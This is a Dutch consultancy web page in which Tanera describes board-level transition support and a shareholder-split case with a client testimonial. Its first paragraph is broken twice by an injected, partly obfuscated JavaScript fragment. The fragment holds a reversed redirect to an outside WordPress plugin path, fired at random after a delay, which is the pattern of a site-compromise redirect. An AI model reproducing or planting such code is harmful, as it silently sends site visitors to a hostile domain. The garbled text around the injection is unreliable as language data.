Transitie ondersteuning op directie niveauTanera

Organisaties zijn leefsystemen en gedragen zich ook zo. Elke deelnemer heeft invloed op het welzijn en succes van het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal en het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal heeft invloed op het welzijn en succes van elke deelnemer. Zo werkt alles samen en ontstaat er ‘Flow’.

Wij houden de ‘rode draad’ in de gaten en verbinden strategie met de dagelijkse werkzaamheden. Rust en overzicht in het proces zijn daarbij belangrijke aandachtspunten, omdat ze meerwaarde leveren voor alle betrokkenen.

Aandeelhouders van een multinationale handelsorganisatie hadden verschillende beelden over de groeimogelijkheden en besloten elk hun eigen weg te gaan. Een van de aandachtspunten was om alle stakeholders (klanten, medewerkers, leveranciers, logistieke partners, bank, accountant) tijdens dit proces aangesloten en gemotiveerd te houden.

Tanera begeleidde beide partijen bij de succesvolle splitsing. Gedurende dit meerjarige traject zijn tegelijkertijd werkwijzen en systemen verder geprofessionaliseerd en werd een groei van tientallen procenten per jaar voortgezet. Eén van de aandeelhouders: “Bedankt voor je geduld en kennis tijdens de splitsing. Heel erg bedankt!”